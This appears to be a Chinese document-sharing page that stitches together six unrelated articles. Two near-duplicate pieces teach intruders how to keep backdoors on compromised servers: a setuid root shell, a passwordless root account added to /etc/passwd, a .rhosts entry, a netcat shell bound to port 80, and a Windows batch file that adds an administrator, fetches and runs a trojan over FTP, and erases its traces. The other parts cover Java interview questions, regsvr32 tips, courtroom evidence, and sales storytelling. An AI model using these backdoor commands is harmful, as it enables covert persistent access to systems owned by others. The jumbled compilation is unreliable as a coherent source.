当前位置：首页 > 实用文档 > 其他范文> 技巧系列之常见的一些留后门手法

技巧系列之常见的一些留后门手法

时间：2022-04-30 12:41:03 其他范文收藏本文下载本文

“月下一番星”为你分享6篇“技巧系列之常见的一些留后门手法”，经本站小编整理后发布，但愿对你的工作、学习、生活带来方便。

技巧系列之常见的一些留后门手法

篇1：技巧系列之常见的一些留后门手法

对于我们这样的菜手，好不容易搞了台服务器很不容易，如果被发现了就惨了，

技巧系列之常见的一些留后门手法

。其实，开后门的方法有很多种，下面我来说说，我以前学习过的几种方法。

1. Setuid

#cp /bin/sh /tmp/.root#chmod u+s /tmp/.root

加上 suid 位到shell 上，虽然很简单，但容易被发现。

2. Echo “hack::0:0::/:/bin/csh” >> /etc/passwd

即给系统增加一个 ID 为 0（root)的帐号，无口令，但管理员用find命令就可以发现。

3.Echo “+ hack”>>/.rhosts

如果这个系统开了512、513的port，就可以。把一个名为hack加到.rhosts文件中，rlogin登陆，无须密码。

4.修改 Sendmail.cf文件

增加一个“wiz” 命令，然后telnet www.xxx.com 25后，wiz，这就可以了。

5. Rootkit backdoor

这些东西现在是很火热的东西，但小心该后的文件的适用性、日期等等一些小的细节。有的需要自己编译，有的是编译好的。

6.Remote shell

Sunx的那个backdoor就很不错，不会产生日记文件，防止who等等。需要编译，但运行在redhat 6.1很不错。但在7.1等版本中好象就有点bug。

或者可以bindshell，可以替换inetd.conf中不常用的服务，注意文件的修改时间。

7. Http后门

其实，一般的防火墙对Web服务的限制少的很，所以我们可以从这里入手，这里需要用到端口重定向，简单的说就是web开的http服务有2个，一个是http本身，一个是remote shell bindshell。防火墙过滤其他一切port，禁止反向连接，简单的就是可以用nc。（netcat这个）把cmd.exe绑定到80端口上去。telnet www.xxx.com 80 然后就得到一个shell。或者可以利用asp,php.cgi等代码写的后门，也可以作到相同的效果。

8.Bat后门（原创）

如果是xnix服务器，没办法。

Ms服务器：

backdoor.bat

net user hacker windychild /add

net localgroup administrators hacker /add ...create super admin user

echo open www.xxx.com>c:ftp.txt

echo xxx>>c:ftp.txtecho xxxxxx>>c:ftp.txt

echo get srv.exe>>c:ftp.txt

echo bye>>c:ftp.txt

ftp -s:c:ftp.txt

copy srv.exe c:winnt

c:winntsrv.exe

del c:ftp.txt

del c:srv.exe ......可以自己设置木马或后门等....或你可以写上开启3389服务，telnet的语句其他，开放共享服务！

net share ipc=ipc$

net share hdc=c$......

如果狠点的话，干脆再给它上个rootkit for win。

9.可以利用邮件编码漏洞

自己设置一个base64的编码文件发给你的朋友，然后把后门.exe转换成邮件编码。

其实，上面的方法都是很常见的方法。还有很多方法，一时没办法整理出来，但对于新手来说足够了

篇2：技巧中常见的留后门手法！

对于我们这样的菜手，好不容易搞了台服务器很不容易，如果被发现了就惨了，

技巧中常见的留后门手法！

。其实，开后门的方法有很多种，下面我来说说，我以前学习过的几种方法。

1. Setuid

#cp /bin/sh /tmp/.root#chmod u+s /tmp/.root

加上 suid 位到shell 上，虽然很简单，但容易被发现。

2 . Echo “hack::0:0::/:/bin/csh” >> /etc/passwd

即给系统增加一个 ID 为 0（root)的帐号，无口令，但管理员用find命令就可以发现。

3.Echo “+ hack”>>/.rhosts

如果这个系统开了512、513的port，就可以。把一个名为hack加到.rhosts文件中，rlogin登陆，无须密码。

4.修改 Sendmail.cf文件

增加一个“wiz” 命令，然后telnet www.xxx.com 25后，wiz，这就可以了。

5. Rootkit backdoor

这些东西现在是很火热的东西，但小心该后的文件的适用性、日期等等一些小的细节。有的需要自己编译，有的是编译好的。

6.Remote shell

Sunx的那个backdoor就很不错，不会产生日记文件，防止who等等。需要编译，但运行在redhat 6.1很不错。但在7.1等版本中好象就有点bug 。

或者可以bindshell，可以替换inetd.conf中不常用的服务，注意文件的修改时间，

7. Http后门

其实，一般的防火墙对Web服务的限制少的很，所以我们可以从这里入手，这里需要用到端口重定向。简单的说就是web开的http服务有2个，一个是http本身，一个是remote shell bindshell。防火墙过滤其他一切port，禁止反向连接，简单的就是可以用nc。（netcat这个）把cmd.exe绑定到80端口上去。telnet www.xxx.com 80 然后就得到一个shell。或者可以利用asp,php.cgi等代码写的后门，也可以作到相同的效果。

8.Bat后门（原创）

如果是xnix服务器，没办法。

Ms服务器：

backdoor.batnet user hacker windychild /addnet localgroup administrators hacker /add ...create super admin userecho open www.xxx.com>c:ftp.txtecho xxx>>c:ftp.txtecho xxxxxx>>c:ftp.txtecho get srv.exe>>c:ftp.txtecho bye>>c:ftp.txtftp -s:c:ftp.txtcopy srv.exe c:winntc:winntsrv.exedel c:ftp.txtdel c:srv.exe ......可以自己设置木马或后门等....或你可以写上开启3389服务，telnet的语句其他，开放共享服务！net share ipc=ipc$net share hdc=c$......

如果狠点的话，干脆再给它上个rootkit for win。

9.可以利用邮件编码漏洞

自己设置一个base64的编码文件发给你的朋友，然后把后门.exe转换成邮件编码。

其实，上面的方法都是很常见的方法。还有很多方法，一时没办法整理出来，但对于新手来说足够了！

篇3：常见面试题六之java系列

Collection：代表一组对象，每一个对象都是它的子元素。

Set：不包含重复元素的Collection。

List：有顺序的collection，并且可以包含重复元素。

Map：可以把键(key)映射到值(value)的对象，键不能重复。

HashMap和Hashtable有什么区别?

HashMap和Hashtable都实现了Map接口，因此很多特性非常相似。但是，他们有以下不同点：

HashMap允许键和值是null，而Hashtable不允许键或者值是null。

Hashtable是同步的，而HashMap不是。因此，HashMap更适合于单线程环境，而Hashtable适合于多线程环境。

HashMap提供了可供应用迭代的键的集合，因此，HashMap是快速失败的。另一方面，Hashtable提供了对键的列举(Enumeration)。

一般认为Hashtable是一个遗留的类。

ArrayList和LinkedList有什么区别?

ArrayList和LinkedList都实现了List接口，他们有以下的不同点：

ArrayList是基于索引的数据接口，它的底层是数组。它可以以O(1)时间复杂度对元素进行随机访问。与此对应，LinkedList是以元素列表的形式存储它的数据，每一个元素都和它的前一个和后一个元素链接在一起，在这种情况下，查找某个元素的时间复杂度是O(n)。

相对于ArrayList，LinkedList的插入，添加，删除操作速度更快，因为当元素被添加到集合任意位置的时候，不需要像数组那样重新计算大小或者是更新索引。

LinkedList比ArrayList更占内存，因为LinkedList为每一个节点存储了两个引用，一个指向前一个元素，一个指向下一个元素。

好了，今天我们就先解释和总结这5个问题吧，接下来我会再发一篇关于java中非常重要的一些问题的文章，敬请期待。

篇4：技巧系列之如何注册DLL或OCX文件

技巧系列之如何注册DLL或OCX文件

。下面介绍这个方法注册DLL文件：打开HKEY_CLASSES_ROOR/Dllfile，新建项shell，再其下新建Register。你会发现Register就是右键弹出的菜单名，再在其下建command，修改其“默认值”为Regsvr32 %1 反...

正文：

大家注册DLL或OCX的方法应该用Regsvr32.exe，用得多了大家一定会觉得在运行中写一长串东西很是烦人吧！这里我向大家介绍一种麻烦一次方便“一生”的方法。这个方法只要右击你想注册或反注册的OCX或DLL就可以了。它的原理是通过修改注册表使右击OCX或DLL文件时出现注册和反注册的菜单项。

下面介绍这个方法

注册DLL文件：打开HKEY_CLASSES_ROOR/Dllfile，新建项shell，再其下新建Register。你会发现Register就是右键弹出的菜单名，再在其下建command，修改其“默认值”为Regsvr32 %1

反注册DLL文件：打开HKEY_CLASSES_ROOR/Dllfile，新建项shell，再其下新建Unregister，再在其下建command，修改其“默认值”为Regsvr32 %1 /u。

注册和反注册OCX文件打开HKEY_CLASSES_ROOR/OCXfile，然后其它的方法和上面的一样的了。

右击一个OCX或DLL试试看，出现了我们想要的Register和Unregister菜单项。

Activex注册和反注册工具――Regsvr32

使用过Activex的人都知道，Activex不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的Activex控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？如果修改注册表那就太麻烦了，在Windows的system文件夹下有一个regsvr32.exe的程序，它就是Windows自带的Activex注册和反注册工具，

它的用法为：

regsver32详解

regsvr32 [/s] [/n] [/i(:cmdline)] dllname/> 其中dllname为activex控件文件名，建议在安装前拷贝到system文件夹下。

参数有如下意义：

/u――反注册控件

/s――不管注册成功与否，均不显示提示框

/c――控制台输出

/i――跳过控件的选项进行安装（与注册不同）

/n――不注册控件，此选项必须与/i选项一起使用

如笔者要注册一amovie.ocx控件，则打入regsvr32 amovie.ocx即可，要反注册它时只需使用regsvr32 /u amovie.ocx就行了。

regsvr32 /s APIINEX.dll 注册DLL文件regsvr32 /s /u APIINEX.dll 卸载DLL文件regsvr32 Shortcut.ocx 注册ocx文件regsvr32 /u Shortcut.ocx 卸载ocx文件/s .dll,.ocx 注册成功后不显示提示信息。/u .dll,.ocx 卸载/> 可把注册控件的命令放入批处理文件中。

regedit /s adofre15.reg/> 直接把注册信息注入注册表。

篇5：法庭辩论技巧之常见的质证内容

法庭辩论技巧之常见的质证内容

A、公证书：

公证是有地域管辖的;公证法第二十五条自然人、法人或者其他组织申请办理公证，可以向住所地、经常居住地、行为地或者事实发生地的公证机构提出。超出管辖的公证书效力是有问题的。公证只能证明签字行为是真实的，不能证明行为的真实意思表示，也不能证明待证行为是合法的。待证事实与行为是否合法有效，应当依据法律判断。公证书中如证明待证事实合法有效或是双方的真实意思表示等内容，应当是违法的。

B、鉴定报告：

是谁委托鉴定的?鉴定机构及人员的资格证书有没有?委托的材料是什么?鉴定的依据?鉴定的过程?这里要注意的是：鉴定的检材有否双方封存，所鉴定的东西是不是双方争议的东西。如公章，一个单位如有二个公章如何鉴定，如纺织品的鉴定，单方鉴定怎么能确定所提交的样品是双方争议的产品。

C、传真件：

传真件非原件，不可单独作为证据。确定是否发出的证据，哪个电话，这门电话的所有人及通话清单有否?只有有其他证据相佐证的情况下才可作为证据使用，通过一系列传真和其他书面证据能够证明其连续性的，特别是双方互有传真往来彼此是相互衔接的，足以认定传真件的真实性并具有证据效力。所以我方如是接收方，如证据对我方不利，我方可以否认收到传真。

D、录音录像资料：

材料中的双方是谁?除非是提供方的资料中显示的是对方法定代表人或授权人的意思表达，否则，一旦资料中人员不出庭，就无法确定资料的真实性。所以资料中的主体问题。另外要审查的是录音录像资料有否剪接或拼凑的痕迹。

E、证人证言：

在获得证人名单后，应与当事人沟通，证人是否完全民事行为能力人、是否了解案件事实、是否与双方具有法律上的利害关系，是否有人做工作来作证。质证时应就下列问题询问：利害关系;是否主观判断;内容是否不肯定;内容是否与现有双方认可的证据相冲突。当然询问证人是个技巧问题，后面论述。

F、补强证据：

补强证据规则，是指法律规定，因某一证据的证明力较弱，不能将其单独作为认定案件事实的依据，只有在其他证据以佐证方式对其证明力给予补充、加强的情况下，法院才能将该证据作为认定案件事实的依据的规则。

篇6：《故事赢销》系列文章之四：讲故事的5种技巧

同样的故事不同的人去讲述的时候，收到的效果却有着天壤之别，会讲故事的人能够通过一些技巧牢牢地吸引住每个听众的心，让大家听完以后产生心灵的涤荡和共鸣；不会讲故事的人讲述的故事则味同咀蜡，枯燥无比，

如果你还不知道如何提升自己讲故事的能力的话，也许下面的五个小技巧对你会有一些帮助。

1、细节描述

想想看，你跟顾客说“前天有位先生也买了您看中的这款产品”和“前天有位带眼镜的张先生也买了您看中的这款产品”哪个更能让人信服呢？当然是后者。究其原因无外乎后面的说法多了对张先生的描述，多了细节的说明，有了细节的描述可信度无疑得到了极大的提高。所以作为故事讲述者，掌握了细节的描述技巧，即使故事不够精彩，同样可以吸引人，相对于假想人们更喜欢真实发生的事情，尤其是悲剧。

所以，当你想跟顾客描述一款差的灯具产品对人的眼睛伤害有多大时，你不能直接告诉对方说“差的护眼灯频闪严重不护眼”，而应该开始一个充满了细节描述的故事：您想想看，在一闪一闪的灯光下看书时什么感觉，不要太长时间您的眼睛就会酸疼而不停地揉眼睛。这还不是最严重的，不好的护眼灯对眼睛的最大伤害是无法直接看到的，如果长期在这种灯光下学习的话，早晚都会造成近视眼，就象我们家隔壁的邻居……

时间、地点、人物都是细节描述的一些关键要素，时间说的越详细越能够增加故事的可信度，对于地点的交代也不该一笔带过。那些讲故事的高手通常在讲故事的时候，会用大量的时间来渲染细节，从而牢牢地吸引听众的注意力，让他跟着自己的节奏走，

当我们用“例证法”向顾客证明自己的产品实力时，最好要说出“样板顾客”的一些细节，他的言谈举止、说话风格和衣着打扮，这样顾客会觉得你没有捏造事实，你是真诚地在与他分享一个成功销售的故事。

2、背景

当我写下“背景”这两个字的时候，我就想起朱元璋写下的那句大实话“饿了吃糠甜如蜜，饱了吃蜜也不甜”，一个人对美味的评价不仅取决于食物本身，还取决于吃食物时的处境。好的故事需要有好的背景，聪明的故事讲述者一定会提供一个适合听故事的环境，在这个环境中所有的人都可以全神贯注，专注于故事情节而不受干扰。想想古时候，我们的祖先围坐在篝火边听故事的场景，那是多么温馨美妙的夜晚啊。在门店销售的现场，当你正用心为顾客介绍产品的时候，你的身边不断地有同事在打招呼或者各种声音出现，这该是多么难堪的销售背景。

现在已经有越来越多的门店开始运用“感官营销”的技巧了，音乐无意中成了很多销售故事的背景。当销售人员正在与顾客分享故事时，激昂亢奋的音乐无疑会干扰销售人员的完美表现。在家居零售卖场到底放什么音乐合适，笔者认为既然是家居卖场那么温馨舒适的音乐比较合适，当然这也和产品、品牌有关，如果品牌相对比较高端的话，钢琴曲是不错的选择。总之，在销售现场要尽量避免过于亢奋的音乐和低俗的流行音乐，轻音乐能为销售故事增加五彩缤纷的颜色。

★ 初中语文课外文言文阅读命题解析及答题思路技巧